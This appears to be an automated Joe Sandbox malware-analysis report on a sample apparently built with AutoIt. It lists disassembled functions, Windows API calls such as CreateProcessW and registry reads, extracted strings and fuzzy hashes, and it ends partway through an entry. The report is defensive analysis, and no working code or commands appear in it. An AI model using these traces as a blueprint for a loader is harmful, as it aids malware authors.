                                    control_flow_graph 1458 1351af-1351c5 1459 1352a2-1352a6 1458->1459 1460 1351cb-1351e0 call 136b0f 1458->1460 1463 1351e6-135206 call 136a63 1460->1463 1464 1a3ca1-1a3cb0 LoadStringW 1460->1464 1466 1a3cbb-1a3cd3 call 13510d call 134db1 1463->1466 1469 13520c-135210 1463->1469 1464->1466 1476 135220-13529d call 150d50 call 1350e6 call 150d23 Shell_NotifyIconW call 13cb37 1466->1476 1480 1a3cd9-1a3cf7 call 13518c call 134db1 call 13518c 1466->1480 1470 1352a7-1352b0 call 136eed 1469->1470 1471 135216-13521b call 13510d 1469->1471 1470->1476 1471->1476 1476->1459 1480->1476
                                    APIs
                                    • _memset.LIBCMT ref: 0013522F
                                    • _wcscpy.LIBCMT ref: 00135283
                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00135293
                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 001A3CB0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                    • String ID: Line:
                                    • API String ID: 1053898822-1585850449
                                    • Opcode ID: 7110183ff731178baf8b44d51da0f4ea8222130170d60b1efbf90bd499dcf285
                                    • Instruction ID: 2612cdfe471a1a2dbab9416b8041fef21614fbc811ab691f3c2ae2c74854707d
                                    • Opcode Fuzzy Hash: 7110183ff731178baf8b44d51da0f4ea8222130170d60b1efbf90bd499dcf285
                                    • Instruction Fuzzy Hash: FC31AD71108740AFD325EBA0EC46FEF77E8AB64750F00451AF59992091EB70A688CB96
                                    Function 001340E5 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1493 1340e5-134105 call 15f8a0 1496 1a370e-1a3777 call 150d50 1493->1496 1497 13410b-134136 call 13660f call 1340a7 call 1349a0 call 134139 1493->1497 1505 1a3779 1496->1505 1506 1a3780-1a3789 call 136a63 1496->1506 1505->1506 1510 1a378e 1506->1510 1510->1510
                                    APIs
                                    • _memset.LIBCMT ref: 001A3725
                                      • Part of subcall function 0013660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001353B1,?,?,001361FF,?,00000000,00000001,00000000), ref: 0013662F
                                      • Part of subcall function 001340A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001340C6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: NamePath$FullLong_memset
                                    • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$X$au3
                                    • API String ID: 3051022977-1954568251
                                    • Opcode ID: 4b281fbc3646e6e2b0aa22277ab8c768c32098eea61e740964de5d699bdba60e
                                    • Instruction ID: 56a7fad37f67c93c453d36c9ed7ab17b42349a8b60ba48f087e48a66542f9cf2
                                    • Opcode Fuzzy Hash: 4b281fbc3646e6e2b0aa22277ab8c768c32098eea61e740964de5d699bdba60e
                                    • Instruction Fuzzy Hash: 1321D571A00688ABCF01DFD4D805BEEBBF8AF59304F008059F414BB241DBB46A898F61
                                    Function 00134139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 001341A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,001339FE,?,00000001), ref: 001341DB
                                    • _free.LIBCMT ref: 001A36B7
                                    • _free.LIBCMT ref: 001A36FE
                                      • Part of subcall function 0013C833: __wsplitpath.LIBCMT ref: 0013C93E
                                      • Part of subcall function 0013C833: _wcscpy.LIBCMT ref: 0013C953
                                      • Part of subcall function 0013C833: _wcscat.LIBCMT ref: 0013C968
                                      • Part of subcall function 0013C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0013C978
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                    • API String ID: 805182592-1757145024
                                    • Opcode ID: a7828c20f592b3f6b2b446a9a6359855fd85f8970608a859f5a84dac4a1fccb5
                                    • Instruction ID: 90d6152b6913b7d84f2b089053e0afe088dbfb3a2026d8b8524d5ec88e19eb34
                                    • Opcode Fuzzy Hash: a7828c20f592b3f6b2b446a9a6359855fd85f8970608a859f5a84dac4a1fccb5
                                    • Instruction Fuzzy Hash: DC916375910219EFCF05EFA4DC91AEDB7B4BF29310F104429F426AB291DB34AA45CB90
                                    Function 0177D310 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 151fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0177D200: Sleep.KERNELBASE(000001F4), ref: 0177D211
                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0177D437
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1614350929.000000000177A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0177A000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_177a000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CreateFileSleep
                                    • String ID: 7RXW5AB1R9N9M
                                    • API String ID: 2694422964-313853021
                                    • Opcode ID: 67799b6b193445083047bb5dc5dbd49d2b3cc34bce5e1fcb07612b40c30da56c
                                    • Instruction ID: 0e63347f884339f534aa00581c2bedbc70d4e3813d658d1283f7cc2feff0dfc3
                                    • Opcode Fuzzy Hash: 67799b6b193445083047bb5dc5dbd49d2b3cc34bce5e1fcb07612b40c30da56c
                                    • Instruction Fuzzy Hash: 6F518030D04249DBEF21DBF4C859BEEBB79AF58304F004599E608BB2C1D6B91B45CB65
                                    Function 00134A30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00135374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,001F1148,?,001361FF,?,00000000,00000001,00000000), ref: 00135392
                                      • Part of subcall function 001349FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00134A1D
                                    • _wcscat.LIBCMT ref: 001A2D80
                                    • _wcscat.LIBCMT ref: 001A2DB5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: _wcscat$FileModuleNameOpen
                                    • String ID: \$\Include\
                                    • API String ID: 3592542968-2640467822
                                    • Opcode ID: 1857b13d34bed3f1b0ae19bdad427471213e492365d2b65299f28ecbf530e1db
                                    • Instruction ID: 5b0c2aa9581d2169c4301fc1347b9557dde7f72002e00ef5417b4371d982845a
                                    • Opcode Fuzzy Hash: 1857b13d34bed3f1b0ae19bdad427471213e492365d2b65299f28ecbf530e1db
                                    • Instruction Fuzzy Hash: 335187754083409FC714EF59E9818BEB7F8FFAA300F40452EF64993661EB749988CB5A
                                    Function 001534AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                    Download Yara Rule
                                    APIs
                                    • __getstream.LIBCMT ref: 001534FE
                                      • Part of subcall function 00157C0E: __getptd_noexit.LIBCMT ref: 00157C0E
                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 00153539
                                    • __wopenfile.LIBCMT ref: 00153549
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                    • String ID: <G
                                    • API String ID: 1820251861-2138716496
                                    • Opcode ID: bfca694943dbfdbcdac4f1e0f2fdde655c6de6270c7501f6f309e88b586175e1
                                    • Instruction ID: e6a423bea8fdd60cac7ef081400c1a327d5572af42da0572104481702a99f30e
                                    • Opcode Fuzzy Hash: bfca694943dbfdbcdac4f1e0f2fdde655c6de6270c7501f6f309e88b586175e1
                                    • Instruction Fuzzy Hash: 8811E770A00206DFDB26BF709C4266E36E4AF15392B158825EC35CF181FB30CB1997A1
                                    Function 0014D298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0014D28B,SwapMouseButtons,00000004,?), ref: 0014D2BC
                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0014D28B,SwapMouseButtons,00000004,?,?,?,?,0014C865), ref: 0014D2DD
                                    • RegCloseKey.KERNELBASE(00000000,?,?,0014D28B,SwapMouseButtons,00000004,?,?,?,?,0014C865), ref: 0014D2FF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: Control Panel\Mouse
                                    • API String ID: 3677997916-824357125
                                    • Opcode ID: cce2b75daf3434a1ca514e29788ec109976eccba469543f70f3ba4ecb62007ec
                                    • Instruction ID: 27085cb9fb15cedc2e529bf3fde177eb10c078bcbb1cbb8977d8f69a84f8cd1c
                                    • Opcode Fuzzy Hash: cce2b75daf3434a1ca514e29788ec109976eccba469543f70f3ba4ecb62007ec
                                    • Instruction Fuzzy Hash: D01157B5611208BFDF258FA4EC84EAE7BB8EF04740B004569F801D7120E771AE40AB60
                                    Function 0015365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                    • String ID:
                                    • API String ID: 3877424927-0
                                    • Opcode ID: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
                                    • Instruction ID: a2fc3e51de0abbb498f0b4a49b575fef1b5d1bc7532c7fee7f9c1f10bcd51cae
                                    • Opcode Fuzzy Hash: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
                                    • Instruction Fuzzy Hash: 6351C9B1E00205EBCB288FA9888556E77A1AF543A2F24872DFC359F2D0D7709F589B50
                                    Function 0017C396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00134517: _fseek.LIBCMT ref: 0013452F
                                      • Part of subcall function 0017C56D: _wcscmp.LIBCMT ref: 0017C65D
                                      • Part of subcall function 0017C56D: _wcscmp.LIBCMT ref: 0017C670
                                    • _free.LIBCMT ref: 0017C4DD
                                    • _free.LIBCMT ref: 0017C4E4
                                    • _free.LIBCMT ref: 0017C54F
                                      • Part of subcall function 00151C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00157A85), ref: 00151CB1
                                      • Part of subcall function 00151C9D: GetLastError.KERNEL32(00000000,?,00157A85), ref: 00151CC3
                                    • _free.LIBCMT ref: 0017C557
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                    • String ID:
                                    • API String ID: 1552873950-0
                                    • Opcode ID: 4d0011766ac7825e8f5428eacbaa439ae8e3e2767bcc598b916f2a43082ec030
                                    • Instruction ID: aebe2be37f230b460545b74929be94aac753709bbca52715360bd3f4d951716c
                                    • Opcode Fuzzy Hash: 4d0011766ac7825e8f5428eacbaa439ae8e3e2767bcc598b916f2a43082ec030
                                    • Instruction Fuzzy Hash: 0B5162B1904218AFDF249F64DC81BADBBB9EF58304F1040AEF61DA7241DB716A80CF58
                                    Function 0014F4EA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0015395C: __FF_MSGBANNER.LIBCMT ref: 00153973
                                      • Part of subcall function 0015395C: __NMSG_WRITE.LIBCMT ref: 0015397A
                                      • Part of subcall function 0015395C: RtlAllocateHeap.NTDLL(01730000,00000000,00000001), ref: 0015399F
                                    • std::exception::exception.LIBCMT ref: 0014F51E
                                    • __CxxThrowException@8.LIBCMT ref: 0014F533
                                      • Part of subcall function 00156805: RaiseException.KERNEL32(?,?,0000000E,001E6A30,?,?,?,0014F538,0000000E,001E6A30,?,00000001), ref: 00156856
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                    • String ID: bad allocation
                                    • API String ID: 3902256705-2104205924
                                    • Opcode ID: 95170121567cb2228c02ec3114ba13d00f2575de04498d4a297f05c4faaf84dd
                                    • Instruction ID: 235682dfdf210019271c676c5473fc4a8c6d21b79af11aff41ae61eb8cb6f9c6
                                    • Opcode Fuzzy Hash: 95170121567cb2228c02ec3114ba13d00f2575de04498d4a297f05c4faaf84dd
                                    • Instruction Fuzzy Hash: ADF0A47110421DA7D708BFA8E9159DE77A89F10354FA04039FD14EB291DFB0964586E5
                                    Function 0177BF10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 0177BF55
                                    • ExitProcess.KERNEL32(00000000), ref: 0177BF74
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1614350929.000000000177A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0177A000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_177a000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Process$CreateExit
                                    • String ID: D
                                    • API String ID: 126409537-2746444292
                                    • Opcode ID: 8ff53cc741f04adc946779470c72492426263afa614c789403871e93d35377f7
                                    • Instruction ID: 61830d5fb91255f9c463bd159fae9c2bb240710740e3784707cc11051a6aff69
                                    • Opcode Fuzzy Hash: 8ff53cc741f04adc946779470c72492426263afa614c789403871e93d35377f7
                                    • Instruction Fuzzy Hash: 56F0ECB154024CABDF60DFE4CC49FEEB77CBF04705F508508BA0ADA184EA7596088B61
                                    Function 0017C71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetTempPathW.KERNEL32(00000104,?), ref: 0017C72F
                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0017C746
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Temp$FileNamePath
                                    • String ID: aut
                                    • API String ID: 3285503233-3010740371
                                    • Opcode ID: a64b4a47cff93cc6477ab3938966b006c7439a89292c5a443465c7b35c7199af
                                    • Instruction ID: 4b8528969033f07c0132599b563c487ce025d03da0080427d7a97f1c151c10e7
                                    • Opcode Fuzzy Hash: a64b4a47cff93cc6477ab3938966b006c7439a89292c5a443465c7b35c7199af
                                    • Instruction Fuzzy Hash: 76D05E7150030EAFDB10AB90EC4EF8A776C9700708F0002E07650A50B2EBB0E6D98B54
                                    Function 0018F8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4c342c9b89239015b36fa9f69e26f114da21038ac59838e0bcfe13c195cd7bf9
                                    • Instruction ID: 8b4891250f5da76c7b2eb4162a2a609d2f324659f58b811cb500405ddae01026
                                    • Opcode Fuzzy Hash: 4c342c9b89239015b36fa9f69e26f114da21038ac59838e0bcfe13c195cd7bf9
                                    • Instruction Fuzzy Hash: ABF15A716083019FCB14EF24C885B5AB7E5FF98314F14892DF9999B292D770EA46CF82
                                    Function 00134FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 00135022
                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 001350CB
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: IconNotifyShell__memset
                                    • String ID:
                                    • API String ID: 928536360-0
                                    • Opcode ID: 12bea02779123c6ba91f52ac69b79462b40fb942d717488da4810b7bcbea5b45
                                    • Instruction ID: 1e8464cc86dd447d51d4d94bd8f3e2751886c4cb954a886583af50a274035060
                                    • Opcode Fuzzy Hash: 12bea02779123c6ba91f52ac69b79462b40fb942d717488da4810b7bcbea5b45
                                    • Instruction Fuzzy Hash: 9D31C1B0504701DFD325DF74D8406ABBBE8FF48708F00092EF59A83641E772A984CB92
                                    Function 0015395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • __FF_MSGBANNER.LIBCMT ref: 00153973
                                      • Part of subcall function 001581C2: __NMSG_WRITE.LIBCMT ref: 001581E9
                                      • Part of subcall function 001581C2: __NMSG_WRITE.LIBCMT ref: 001581F3
                                    • __NMSG_WRITE.LIBCMT ref: 0015397A
                                      • Part of subcall function 0015821F: GetModuleFileNameW.KERNEL32(00000000,001F0312,00000104,00000000,00000001,00000000), ref: 001582B1
                                      • Part of subcall function 0015821F: ___crtMessageBoxW.LIBCMT ref: 0015835F
                                      • Part of subcall function 00151145: ___crtCorExitProcess.LIBCMT ref: 0015114B
                                      • Part of subcall function 00151145: ExitProcess.KERNEL32 ref: 00151154
                                      • Part of subcall function 00157C0E: __getptd_noexit.LIBCMT ref: 00157C0E
                                    • RtlAllocateHeap.NTDLL(01730000,00000000,00000001), ref: 0015399F
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
